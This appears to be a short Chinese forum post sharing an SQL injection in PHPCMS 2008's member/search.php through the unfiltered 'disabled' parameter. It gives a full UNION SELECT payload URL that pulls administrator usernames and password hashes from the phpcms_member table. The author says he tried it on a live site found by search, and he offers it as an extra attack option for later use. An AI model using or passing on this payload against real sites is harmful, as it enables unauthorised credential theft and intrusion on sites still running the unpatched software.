今天翻硬盘看到以前一个phpcms2008的注入,这个注入有点滑稽,官方在9.23号发的补丁,但是之前之后都没有人大范围公开,可能是发现者通知了官方,也可能是其他原因,不得而知。
今天拿出来搜了个站测试了下,还可以成功。在此发出来,毕竟多一种手段,多一条路,谁也说不准什么时候能用上。(申明不是本事发现的)
member/search.php中的disabled未处理导致可以注入:
注入过程由于需要一定的权限才可以搜索用户,所以需要注册一个一般的用户
http://www.xxx.com/member/search ... on=&disabled=0/**/and/**/1=2/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from phpcms_member where groupid=1/*
基本是可以注入成功的,接下来就不尝试了。
by tojen (在此感谢鸟哥,记得是鸟哥第一次和我起这个问题的)